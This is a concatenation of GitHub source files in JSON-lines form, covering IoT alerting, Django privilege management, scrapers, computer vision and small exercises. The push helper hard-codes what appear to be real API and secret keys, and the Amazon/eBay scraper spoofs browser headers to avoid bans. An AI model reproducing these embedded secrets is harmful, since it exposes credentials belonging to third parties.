self.observe)\n","repo_name":"ChrisPwildcat/FirstGame","sub_path":"src/cp_game/definitions.py","file_name":"definitions.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"1735769445","text":"#Author : Dhanushkumar.M\n#project : Capstone Project for BOLT IOT certification\nimport conf, json, time, math, statistics\nfrom boltiot import Sms, Bolt\ndef send_telegram_message(message):\n url = \"https://api.telegram.org/\" + conf.telegram_bot_id + \"/sendMessage\"\n data = { \"chat_id\": conf.telegram_chat_id,\n \"text\": message\n }\n try:\n response = requests.request( \"GET\",\n url,\n params=data\n )\n print(\"This is the Telegram response\")\n print(response.text)\n telegram_data = json.loads(response.text)\n return telegram_data[\"ok\"]\n except Exception as e:\n print(\"An error occurred in sending the alert message via Telegram\")\n print(e)\n return False\ndef compute_bounds(history_data,frame_size,factor):\n if len(history_data)frame_size :\n del history_data[0:len(history_data)-frame_size]\n Mn=statistics.mean(history_data)\n Variance=0\n for data in history_data :\n Variance += math.pow((data-Mn),2)\n Zn = factor * math.sqrt(Variance / frame_size)\n High_bound = history_data[frame_size-1]+Zn\n Low_Bound = history_data[frame_size-1]-Zn\n return [High_bound,Low_Bound]\nmybolt = Bolt(conf.API_KEY, conf.DEVICE_ID)\nsms = Sms(conf.SSID, conf.AUTH_TOKEN, conf.TO_NUMBER, conf.FROM_NUMBER)\nhistory_data=[]\nwhile True:\n response = mybolt.analogRead('A0')\n data = json.loads(response)\n if data['success'] != 1:\n 
print(\"There was an error while retriving the data.\")\n print(\"This is the error:\"+data['value'])\n time.sleep(5)\n continue\n sensor_value1 = int(data['value'])\n Temperature = sensor_value1*0.0097\n print (\"The current Temparature of Refrigarator is \"+str(sensor_value1)+\" \"+ str(Temperature)+\" degree celsious \")\n sensor_value=0\n try:\n sensor_value = int(data['value'])\n except e:\n print(\"There was an error while parsing the response: \",e)\n continue\n bound = compute_bounds(history_data,conf.FRAME_SIZE,conf.MUL_FACTOR)\n if not bound:\n required_data_count=conf.FRAME_SIZE-len(history_data)\n print(\"Not enough data to computation. Need \",required_data_count,\" more data points\")\n history_data.append(int(data['value']))\n time.sleep(5)\n continue\n try:\n if sensor_value > bound[0] :\n Temperature = sensor_value*0.097\n print (\"bound[0] value is \"+ str(bound[0]))\n print (\"The Temparature level has been Incerased suddenly.Sending SMS\")\n response = sms.send_sms(\"Someone Opened the fridge door. The Current temperature is \" + str(Temperature)+ \" degree celsious\")\n message = \"Alert! The Temparature level has been Increased suddenly.The Current temperature is \" + str(Temperature)+ \" degree celsious \" \n telegram_status = send_telegram_message(message)\n print(\"This is the response for SMS & Telegram \",response, telegram_status)\n elif sensor_value < bound[1] :\n Temperature= sensor_value*0.097\n print (\"Anomaly is Occured due to sudden Change in Temperature\")\n print(\"Sending Alert!\")\n response = sms.send_sms(\"The temperature has decreased to : \"+str(Temperature)+\"degree celcius\")\n message = \"Alert! Sensor value has decreased The current value is \" + str(Temperature)\n telegram_status = send_telegram_message(message)\n print(\"The Status of SMS and Telegram:\",response, telegram_status)\n history_data.append(sensor_value);\n except Exception as e :\n print (\"Error\",e)\n time.sleep(5)\n\n","repo_name":"Dhanushkumar-M/Capstone-Project","sub_path":"anomaly_detection.py","file_name":"anomaly_detection.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"27283611213","text":"# Use modern Python\n\nfrom django.contrib.auth.models import User\nfrom django.core.management import BaseCommand\n\nfrom django_prbac.models import Grant, Role, UserRole\n\nfrom corehq import privileges\n\n\nclass Command(BaseCommand):\n help = 'Grants the user(s) specified the DIMAGI_OPERATIONS_TEAM privilege'\n\n def add_arguments(self, parser):\n parser.add_argument(\n 'usernames',\n nargs=\"*\",\n )\n parser.add_argument(\n '--remove-user',\n action='store_true',\n default=False,\n help='Remove the users specified from the DIMAGI_OPERATIONS_TEAM privilege',\n )\n\n def handle(self, usernames, **options):\n ops_role = Role.objects.get_or_create(\n name=\"Dimagi Operations Team\",\n slug=privileges.OPERATIONS_TEAM,\n )[0]\n accounting_admin = Role.objects.get_or_create(\n name=\"Accounting Admin\",\n slug=privileges.ACCOUNTING_ADMIN,\n )[0]\n if not ops_role.has_privilege(accounting_admin):\n Grant.objects.create(\n from_role=ops_role,\n to_role=accounting_admin,\n )\n remove_user = options['remove_user']\n\n for username in usernames:\n try:\n user = User.objects.get(username=username)\n try:\n user_role = UserRole.objects.get(user=user)\n except UserRole.DoesNotExist:\n user_privs = Role.objects.get_or_create(\n name=\"Privileges for %s\" % user.username,\n 
slug=\"%s_privileges\" % user.username,\n )[0]\n user_role = UserRole.objects.create(\n user=user,\n role=user_privs,\n )\n\n if remove_user:\n try:\n # remove grant object\n grant = Grant.objects.get(\n from_role=user_role.role,\n to_role=ops_role\n )\n grant.delete()\n print(\"Removed %s from the operations team\"\n % user.username)\n except Grant.DoesNotExist:\n print(\"The user %s was never part of the operations \"\n \"team. Leaving alone.\" % user.username)\n elif not user_role.has_privilege(ops_role):\n Grant.objects.create(\n from_role=user_role.role,\n to_role=ops_role,\n )\n print(\"Added %s to the operations team\" % user.username)\n else:\n print(\"User %s is already part of the operations team\"\n % user.username)\n\n except User.DoesNotExist:\n print(\"User %s does not exist\" % username)\n","repo_name":"dimagi/commcare-hq","sub_path":"corehq/apps/accounting/management/commands/add_operations_user.py","file_name":"add_operations_user.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":472,"dataset":"github-code","pt":"45"} +{"seq_id":"14814608479","text":"class Solution(object):\n def longestMountain(self, arr:List[int]):\n up= [0] * len(arr)\n down= [0] * len(arr)\n for i in range( len(arr)-1):\n if arr[i+1] > arr[i]:\n up[i+1] = up[i] + 1\n print(up[i+1])\n \n print(up)\n for i in range(len(arr) - 2,-1,-1):\n print(i)\n if arr[i] > arr[i + 1]: \n down[i] = down[i + 1] + 1\n\n maxx=0\n for u,d in zip(up,down):\n if u!=0 and d!=0:\n maxx=max(maxx,u+d+1)\n return maxx\n\n \n ","repo_name":"Rio3210/LeetCode_solutions","sub_path":"0845-longest-mountain-in-array/0845-longest-mountain-in-array.py","file_name":"0845-longest-mountain-in-array.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"12570715389","text":"#Program to find the roots of a quadratic eqn\r\nimport os \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\r\nimport math\r\na,b,c = eval(input(\"enter the coefficients of the quadratic equation \\n\"))\r\ne=(b**2)-(4*a*c)\r\nprint (\"discriminant D =\",e)\r\n\r\nif a==0 :\r\n\tprint (\"this is not a quadratic equation how ever the root is =\",-c/b)\r\nelif e==0 :\r\n\tprint (\"the roots is real and unique \",-b/(2*a))\r\nelif e>0 :\r\n\tprint (\"the roots are real and distinct\",(-b+math.sqrt(e))/(2*a), \"and\", (-b-math.sqrt(e))/(2*a))\r\nelse :\r\n\tprint (\"the roots are imaginary \",(-b+math.sqrt(-e))/(2*a), \"i and\",(-b-math.sqrt(-e))/(2*a), \"i\" )\r\n\r\nos.system(\"pause\")\r\n","repo_name":"vkgudelli/coding","sub_path":"python/quadraticEq.py","file_name":"quadraticEq.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"25724428094","text":"\n# -*- coding: utf-8 -*-\n\nimport ctypes\nfrom apps.sentry.utils.xg_push import xinge\nfrom apps.sentry.utils.bd_push import Channel\nimport os,time\nfrom apps.common.utils.xutil import is_digit\nimport logging\nlogger = logging.getLogger('qding')\n\n\n\nSERVICE_PROVIDERS = {\n 'BD': {\n 'type': 0,\n 'api_key': 'hWgk7lCY5SGFEEvauGV3cwCv',\n 'secret_key': 'h31ihzVjfe7qVEkiD4HjvN1GhgQzgnoq',\n },\n\n 'XG': {\n 'type': 1,\n 'api_key': 2100096723,\n 'secret_key': '8d511a768774c9743e995615224d3aaf',\n },\n}\n\nENCRYPT_KEY = 0x8DF8A035\nDLL_PATH = os.path.abspath(os.path.dirname(__file__))+os.sep+'libqdkey.so'\n\n\ndef PushMsg(msg, tag):\n ch = 
Channel.Channel(SERVICE_PROVIDERS['BD']['api_key'], SERVICE_PROVIDERS['BD']['secret_key'])\n cnt=ch.pushMessage(Channel.Channel.PUSH_TO_TAG, msg, str(time.time()), { Channel.Channel.TAG_NAME: tag })\n if not cnt:PushMsg(msg, tag)\n \n\ndef mac_to_hash(mac,qr_server_id):\n if mac=='0000':return mac\n mac_str=''\n if not mac or qr_server_id is None:return mac_str\n libfunc=ctypes.CDLL(DLL_PATH)\n p_mac_str=ctypes.create_string_buffer(mac.replace(':','').encode('utf8'),16)\n p_output_mac_str=ctypes.create_string_buffer(8)\n out_len=libfunc.qdhash_str(p_mac_str,p_output_mac_str,int(qr_server_id))\n if out_len !=-1:mac_str=p_output_mac_str[0:4].decode('utf8')\n return mac_str\n\ndef pack_message(codeIndex,enc_key):\n encCodeIndex=\"\"\n if not codeIndex or enc_key is None:return encCodeIndex\n try:\n libfunc = ctypes.CDLL(DLL_PATH)\n p_msg_str = ctypes.create_string_buffer(codeIndex.encode('utf8'))\n p_encry_byte = ctypes.create_string_buffer(1024*16)\n out_len = libfunc.qdmenc_str(p_msg_str,p_encry_byte,1024*16,int(enc_key,16))\n \n if out_len>0:\n encCodeIndex=p_encry_byte[0:out_len].decode('utf8','ignore')\n return encCodeIndex.replace('\\x00','')\n except:\n return \"\"\n\n\ndef unpack_message(encCodeIndex,dec_key):\n decCodeIndex=\"\"\n if not encCodeIndex or not dec_key:return decCodeIndex\n libfunc = ctypes.CDLL(DLL_PATH)\n p_encry_byte = ctypes.create_string_buffer(encCodeIndex.encode('utf8'))\n p_decry_byte = ctypes.create_string_buffer(1024*16)\n out_len = libfunc.qdmdec_hex_str(p_encry_byte,p_decry_byte,1024*16,int(dec_key,16))\n \n if out_len>0:\n decCodeIndex=p_decry_byte[0:out_len].decode('utf8','ignore')\n return decCodeIndex.replace('\\x00','')\n\n\n","repo_name":"webvul/qding","sub_path":"qdmgr_sentry/apps/sentry/utils/qd_push/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"20879910337","text":"from typing import Any, List, Optional, Dict\nfrom warnings import warn\n\nimport numpy as np\n\nfrom utils.evaluation.prophesee.evaluation import evaluate_list\n\n\nclass PropheseeEvaluator:\n LABELS = 'lables'\n PREDICTIONS = 'predictions'\n\n def __init__(self, dataset: str, downsample_by_2: bool):\n super().__init__()\n assert dataset in {'gen1', 'gen4'}\n self.dataset = dataset\n self.downsample_by_2 = downsample_by_2\n\n self._buffer = None\n self._buffer_empty = True\n self._reset_buffer()\n\n def _reset_buffer(self):\n self._buffer_empty = True\n self._buffer = {\n self.LABELS: list(),\n self.PREDICTIONS: list(),\n }\n\n def _add_to_buffer(self, key: str, value: List[np.ndarray]):\n assert isinstance(value, list)\n for entry in value:\n assert isinstance(entry, np.ndarray)\n self._buffer_empty = False\n assert self._buffer is not None\n self._buffer[key].extend(value)\n\n def _get_from_buffer(self, key: str) -> List[np.ndarray]:\n assert not self._buffer_empty\n assert self._buffer is not None\n return self._buffer[key]\n\n def add_predictions(self, predictions: List[np.ndarray]):\n self._add_to_buffer(self.PREDICTIONS, predictions)\n\n def add_labels(self, labels: List[np.ndarray]):\n self._add_to_buffer(self.LABELS, labels)\n\n def reset_buffer(self) -> None:\n # E.g. 
call in on_validation_epoch_start\n self._reset_buffer()\n\n def has_data(self):\n return not self._buffer_empty\n\n def evaluate_buffer(self, img_height: int, img_width: int) -> Optional[Dict[str, Any]]:\n # e.g call in on_validation_epoch_end\n if self._buffer_empty:\n warn(\"Attempt to use prophesee evaluation buffer, but it is empty\", UserWarning, stacklevel=2)\n return\n\n labels = self._get_from_buffer(self.LABELS)\n predictions = self._get_from_buffer(self.PREDICTIONS)\n assert len(labels) == len(predictions)\n metrics = evaluate_list(result_boxes_list=predictions,\n gt_boxes_list=labels,\n height=img_height,\n width=img_width,\n apply_bbox_filters=True,\n downsampled_by_2=self.downsample_by_2,\n camera=self.dataset)\n return metrics\n","repo_name":"uzh-rpg/RVT","sub_path":"utils/evaluation/prophesee/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"45"} +{"seq_id":"3037519544","text":"from behave import step\n\nfrom misttests.integration.gui.steps.buttons import click_button_from_collection\n\nfrom selenium.common.exceptions import TimeoutException\n\nfrom selenium.webdriver.common.by import By\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\n@step('I expect for \"{modal_id}\" modal to {action} within max {seconds} '\n 'seconds')\ndef modal_waiting_with_timeout(context, modal_id, action, seconds):\n if action == 'appear':\n try:\n WebDriverWait(context.browser, int(seconds)).until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, '#' + modal_id)))\n except TimeoutException:\n raise TimeoutException(\"Modal %s did not %s after %s seconds\"\n % (modal_id, action, seconds))\n elif action == 'disappear':\n try:\n WebDriverWait(context.browser, int(seconds)).until(\n EC.invisibility_of_element_located((By.CSS_SELECTOR, '#' + modal_id)))\n except TimeoutException:\n raise TimeoutException(\"Modal %s did not %s after %s seconds\"\n % (modal_id, action, seconds))\n else:\n raise ValueError(\"Action can be either appear or disappear. 
Duh!\")\n\n\n@step('I click the \"{text}\" button inside the \"{modal_id}\" modal')\ndef click_button_within_modal(context, text, modal_id):\n try:\n modal = context.browser.find_element(By.CSS_SELECTOR, '#' + modal_id)\n buttons = modal.find_elements(By.CSS_SELECTOR, \"paper-item\")\n click_button_from_collection(context, text, buttons,\n 'Could not find %s button in %s '\n 'modal' % (text, modal_id))\n return\n except:\n assert False, \"Could not find modal with id %s\" % modal_id\n","repo_name":"mistio/mist.tests","sub_path":"misttests/integration/gui/steps/modals.py","file_name":"modals.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"7233217386","text":"from itertools import combinations\n\ndef solution(numbers):\n answer = []\n\n p = list(combinations(numbers, 2))\n\n for a, b in p:\n temp = a + b\n answer.append(temp)\n\n answer = list(set(answer))\n answer.sort()\n\n return answer\n\nprint(solution([2,1,3,4,1]))\nprint(solution([5,0,2,7]))","repo_name":"bae1022/Coding-Test","sub_path":"Programmers/두 개 뽑아서 더하기.py","file_name":"두 개 뽑아서 더하기.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"5979806576","text":"print('{:^40}'.format('Exercício 42'))\nprint('Analisando Triângulo')\nprint('Refaço o DESAFIO 035 dos triângulos, acrescentando o recurso\\n'\n 'de mostrar que tipo de triângulo será formado:\\n'\n\n 'EQUILÁTERO: todos os lados iguais\\n'\n 'Isósceles: dois lados iguais\\n'\n 'Escaleno: todos os lados diferentes\\n')\nwhile True:\n try:\n a = float(input('Primeiro segmento: '))\n b = float(input('Segundo segmento: '))\n c = float(input('Terceiro segmento: '))\n if a < b + c and b < a + c and c < a + b:\n print('Os segmentos acima podem formar um triângulo ', end='')\n if a == b == c:\n print('EQUILATERO!')\n elif a == b or b == c or c == a:\n print('ISÓSCELES!')\n elif a != b != c != a:\n print('ESCALENO!')\n else:\n print('Não temos um triângulo.')\n except:\n print('Digite um numero válido!')\n","repo_name":"renatanunes03/Python-Mundo-02","sub_path":"Exercicios/ex042 - Analisando Triangulo.py","file_name":"ex042 - Analisando Triangulo.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"28406922927","text":"\nimport smbus \nimport time \nimport sys \nbus = smbus.SMBus(1) \naddress = 0x04 # Arduino I2C Address \n\ndef main(): \n i2cData = False \n while 1: \n # send data \n i2cData = not i2cData \n bus.write_byte(address,i2cData) \n \n data = int(bus.read_byte(address)/2)\n # request data \n # print (\"Arduino answer to RPi:\", data) \n \n time.sleep(1)\n return(data)\n \nif __name__ == '__main__': \n try: \n main() \n except KeyboardInterrupt: \n gpio.cleanup() \n sys.exit(0)","repo_name":"Barry1596/Charging-Station-GUI","sub_path":"Charger-Terminal-GUI/I2Cardu2.py","file_name":"I2Cardu2.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11197502817","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom bs4 import BeautifulSoup, SoupStrainer\nimport requests\n\nHEADERS = ({'User-Agent':\n 'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36', \n 'Accept-Language': 'en-US, 
en;q=0.5'})\nheaders = {\n 'authority': 'www.amazon.com',\n 'pragma': 'no-cache',\n 'cache-control': 'no-cache',\n 'dnt': '1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'sec-fetch-site': 'none',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-dest': 'document',\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n}\n\nproduct_number = 12\n\ndef interface(request):\n if request.method == 'POST':\n product_name = request.POST['product_name']\n amazon_list = amazon_getSearchResult(product_name)\n ebay_list = ebay_getSearchResult(product_name)\n #recommend_list = getRecommendation(amazon_list + ebay_list)\n return render(request, 'products.html', {'product_name': product_name, 'amazon_list':amazon_list, 'ebay_list': ebay_list})\n else:\n return render(request, 'products.html')\n\n\n##########################################################\n# Recommend Result #######################################\n##########################################################\n#def getRecommendation(amazon_list):\n\n##########################################################\n# Amazon Product Result ##################################\n# [url, title, price, rating, review]#####################\n##########################################################\ndef amazon_getSearchResult(product_name):\n url = 'https://www.amazon.com/s?k=' + product_name.replace(' ', '+') + '&ref=nb_sb_noss_1'\n webpage = requests.get(url, headers = headers)\n soup = BeautifulSoup(webpage.content, \"lxml\", parse_only=SoupStrainer(\"a\", {'class':'a-link-normal s-no-outline'}))\n links = soup.find_all(\"a\", attrs={'class':'a-link-normal s-no-outline'})[0:15]\n product_list = []\n count = product_number\n for link in links: \n link = \"https://www.amazon.com\" + link.get('href')\n product_list.append(amazon_product(link))\n if (count <= 0):\n break\n else: \n count -= 1\n if not product_list:\n print(\"\\nWARNING: The user agent might have been temporarily banned. 
Please replace the HEADERS with a valid one, or try again later.\\n\")\n product_list = [[\"https://developers.whatismybrowser.com\", \"Empty\", \"Empty\", \"Empty\"]]\n return product_list\n\ndef amazon_product(url):\n webpage = requests.get(url, headers=headers)\n soup = BeautifulSoup(webpage.content, \"lxml\", parse_only=SoupStrainer([\"span\", \"title\"]))\n title = get_title(soup)\n price = get_price(soup)\n rating = get_rating(soup)\n review = get_reviewNum(soup)\n return [str(url), title, price, rating, review]\n\ndef get_title(soup):\n try: \n title = soup.find(\"span\", attrs={\"id\":'productTitle'}).text.replace('\\n', '').replace('\\'', '')\n except: \n try: \n title = soup.find(\"span\", attrs={\"class\": 'a-size-large qa-title-text'}).text.replace('\\n', '').replace('\\'', '')\n except: \n try: \n title = soup.title.string.replace('Amazon.com', '')\n except:\n title = \"N/A\"\n return title\n\ndef get_price(soup):\n try:\n price = soup.find(\"span\", attrs={'id':'priceblock_ourprice'}).string.strip()\n except:\n try: \n price = soup.find(\"span\", attrs={'class': 'a-offscreen'}).string\n except: \n price = \"N/A\"\n return price\n\ndef get_rating(soup):\n try:\n rating = soup.find(\"span\", attrs={'class':'a-icon-alt'}).string.strip()\n except:\n rating = \"\"\n return rating\n\ndef get_reviewNum(soup): \n try:\n review = soup.find(\"span\", attrs={'id':'acrCustomerReviewText'}).string.strip()\n except:\n review = \"\"\n return review\n\n##########################################################\n# eBay Product Result ###################################\n##########################################################\ndef ebay_getSearchResult(product_name):\n url = 'https://www.ebay.com/sch/i.html?_from=R40&_trksid=p2380057.m570&_nkw=' + product_name.replace(' ', '+') + '&_sacat=0'\n webpage = requests.get(url, headers = HEADERS)\n soup = BeautifulSoup(webpage.content, \"lxml\", parse_only=SoupStrainer(\"a\", {'class':'s-item__link'}))\n links = soup.find_all(\"a\", attrs={'class':'s-item__link'})[0: 15]\n product_list = []\n count = product_number\n for link in links: \n link = link.get('href')\n product_list.append(ebay_product(link))\n if count <= 0:\n break\n else:\n count -= 1\n return product_list\n\ndef ebay_product(url):\n webpage = requests.get(url)\n soup = BeautifulSoup(webpage.text, \"html.parser\", parse_only=SoupStrainer([\"title\", \"span\", \"div\"]))\n title = ebay_get_title(soup)\n price = ebay_get_price(soup)\n condition = ebay_get_condition(soup)\n return [str(url), title, price, condition]\n\ndef ebay_get_title(soup):\n try: \n title = soup.title.string.replace(' | eBay', '')\n except:\n title = \"N/A\"\n return title\n\ndef ebay_get_price(soup):\n try:\n price = soup.find(\"span\", attrs={'id':'prcIsum'}).string.replace('US ', '').replace('/ea', '').strip()\n except: \n try:\n price = soup.find(\"span\", attrs={'class':'notranslate', 'itemprop':'price'}).string.replace('US', '').replace(' ', '').strip()\n except:\n price = \"N/A\"\n return price\n\ndef ebay_get_condition(soup):\n try:\n condition = soup.find(\"div\", attrs={'id':'vi-itm-cond'}).text\n except:\n condition = \"N/A\"\n return condition\n","repo_name":"SorosWen/Product_Info_Scraper","sub_path":"AmazonScrap/scrap/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"34705915701","text":"# performs pedestrian detection on still images based on opencv built-in HOG + SVM 
method\r\n\r\n# the picture directory\r\npic_dir = \"C:\\\\Users\\\\User\\\\Pictures\\\\pedestrian.jpg\"\r\n\r\n# import the necessary packages\r\nfrom imutils.object_detection import non_max_suppression\r\nfrom imutils import paths\r\nimport numpy as np\r\nimport argparse\r\nimport imutils\r\nimport cv2\r\n\r\n# load the image\r\nimg = cv2.imread(pic_dir)\r\n# reduce image size to reduce detection time and improve detection accuracy\r\n#img = imutils.resize(img, width=min(400, img.shape[1]))\r\norig = img.copy()\r\n\r\n# initialize the HOG descriptor/person detector\r\nhog = cv2.HOGDescriptor()\r\nhog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\r\n\r\nimport time\r\ntic = time.time()\r\n# detect people in the image, weights: confidence value returned by svm for each detection\r\n(rects, weights) = hog.detectMultiScale(img, winStride=(4,4), padding=(8,8),\\\r\n scale = 1.02)\r\n#print('detecting confidence:{}'.format(weights))\r\n\r\nprint(\"time elapsed for hog: {}\".format(time.time()-tic))\r\n\r\n\r\n# draw the original bounding boxes\r\nfor (x, y, w, h) in rects:\r\n cv2.rectangle(orig, (x,y), (x+w, y+h), (0, 0, 255), 2)\r\n\r\n\r\n# apply non-maxima suppression to the bounding boxes using a\r\n# fairly large overlap threshold to try to maintain overlapping\r\n# boxes that are still people\r\nrects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])\r\npick = non_max_suppression(rects, probs=None, overlapThresh=0.65)\r\n\r\n# draw the final bounding boxes\r\nfor (xA, yA, xB, yB) in pick:\r\n cv2.rectangle(img, (xA, yA), (xB, yB), (0, 255, 0), 2)\r\n\r\n\r\n# show some information on the number of bounding boxes\r\nfilename = pic_dir[pic_dir.rfind(\"/\") + 1:]\r\nprint(\"[INFO] {}: {} original boxes, {} after suppression\".format(\\\r\n\t\tfilename, len(rects), len(pick)))\r\n\r\n\r\n# show the output images\r\ncv2.imshow(\"Before NMS\", orig)\r\ncv2.imshow(\"After NMS\", img)\r\ncv2.waitKey(0)\r\n","repo_name":"amandayeyan/video_analytics","sub_path":"hog_descriptor.py","file_name":"hog_descriptor.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"23234491465","text":"from Model2 import data_store\r\nfrom Controller2_demo import Credentials\r\nclass Users:\r\n username=\"\"\r\n email=\"\"\r\n ph=\"\"\r\n residence=\"\"\r\n acc=Credentials()\r\n def __init__(self):\r\n choice=float(input(\"Press\\n1:-Search User\\n2:-Register New User\\n\"))\r\n if choice==1:\r\n self.username=input(\"Enter your Name\\t\")\r\n login_store=data_store()\r\n login_store.setUsername(self.username)\r\n self.acc.check_login(login_store)\r\n #print(login_store.getReply())\r\n else:\r\n self.username=input(\"Enter your Username\\t\")\r\n self.residence=input(\"Enter your Residence\\t\")\r\n self.email=input(\"Enter your Email\\t\")\r\n self.ph=input(\"Enter your Contact\\t\")\r\n register=data_store()\r\n register.setUsername(self.username)\r\n register.setResidence(self.residence)\r\n register.setEmail(self.email)\r\n register.setContact(self.ph)\r\n self.acc.register_user(register)\r\n '''def display(self):\r\n print(self.username)\r\n print(self.password)'''\r\nusr=Users()\r\n\r\n","repo_name":"irtiqa-reyaz/MVC_Login-System","sub_path":"View2_demo.py","file_name":"View2_demo.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"14195865504","text":"import pytest\n\nfrom 
.test_config import TestMode, TestModeConversionException\n\n\n@pytest.mark.parametrize(\n \"from_mode,to_mode,expected\",\n [\n (TestMode.STANDARD, TestMode.FUZZ, True),\n (TestMode.FUZZ, TestMode.STANDARD, False),\n (TestMode.STANDARD, TestMode.PARAMETERIZED, True),\n (TestMode.PARAMETERIZED, TestMode.FUZZ, True),\n (TestMode.FUZZ, TestMode.PARAMETERIZED, False),\n *[(mode, mode, True) for mode in TestMode],\n *[(TestMode.UNDETERMINED, mode, True) for mode in TestMode],\n *[\n (mode, TestMode.UNDETERMINED, False)\n for mode in TestMode\n if mode is not TestMode.UNDETERMINED\n ],\n ],\n)\ndef test_mode_conversion(from_mode: TestMode, to_mode: TestMode, expected: bool):\n assert from_mode.can_convert_to(to_mode) == expected\n\n if expected:\n assert from_mode.convert_to(to_mode) == to_mode\n else:\n with pytest.raises(TestModeConversionException):\n from_mode.convert_to(to_mode)\n","repo_name":"software-mansion/protostar","sub_path":"protostar/testing/test_config_test.py","file_name":"test_config_test.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"45"} +{"seq_id":"17086827336","text":"import numpy as np\nfrom sklearn.metrics import pairwise_distances\nimport matplotlib.pyplot as plt\nfrom poincare_maps import *\n\nfrom sklearn.utils.graph_shortest_path import graph_shortest_path\nfrom scipy.sparse import csgraph\nfrom sklearn.neighbors import kneighbors_graph\nfrom data import connect_knn\n\ndef get_dist_manifold(data, k_neighbours = 20, knn_sym=True):\n \"\"\"\n Computes ranking of the original dataset through geodesic distances:\n we estimate KNN graph and find shortest distance on it. The geodesic\n distance between disconnected componenents is set to infinity.\n \"\"\"\n KNN = kneighbors_graph(\n data, k_neighbours, mode='distance', include_self=False).toarray()\n if knn_sym:\n KNN = np.maximum(KNN, KNN.T)\n \n n_components, labels = csgraph.connected_components(KNN)\n \n if (n_components > 1):\n print('Connecting', n_components)\n distances = pairwise_distances(data, metric='euclidean')\n KNN = connect_knn(KNN, distances, n_components, labels)\n \n D_high = graph_shortest_path(KNN)\n return D_high\n\n\ndef get_ranking(distance_matrix):\n \"\"\"\n Get ranking from distance matrix: from Supplementary eq. (2)-(3) \n in Klimovskaia et al.\n \"\"\"\n # According to this definition, reflexive ranks are set\n # to zero and non-reflexive ranks belong to {1,.., N − 1}.\n n = len(distance_matrix)\n Rank = np.zeros([n, n])\n for i in range(n):\n idx = np.array(list(range(n))) \n sidx = np.argsort(distance_matrix[i, :])\n Rank[i, idx[sidx][1:]] = idx[1:]\n\n return Rank\n\n\ndef get_coRanking(Rank_high, Rank_low):\n \"\"\"\n Computes co-ranking matrix Q from Supplementary eq. (4) in Klimovskaia et al.\n \"\"\"\n N = len(Rank_high)\n coRank = np.zeros([N-1, N-1])\n\n for i in range(N):\n for j in range(N):\n k = int(Rank_high[i, j])\n l = int(Rank_low[i, j])\n if (k > 0) and (l > 0):\n coRank[k-1][l-1] += 1\n \n return coRank\n\n\ndef get_score(Rank_high, Rank_low, fname=None): \n \"\"\"\n Computes Qnx scores from Supplementary eq. 
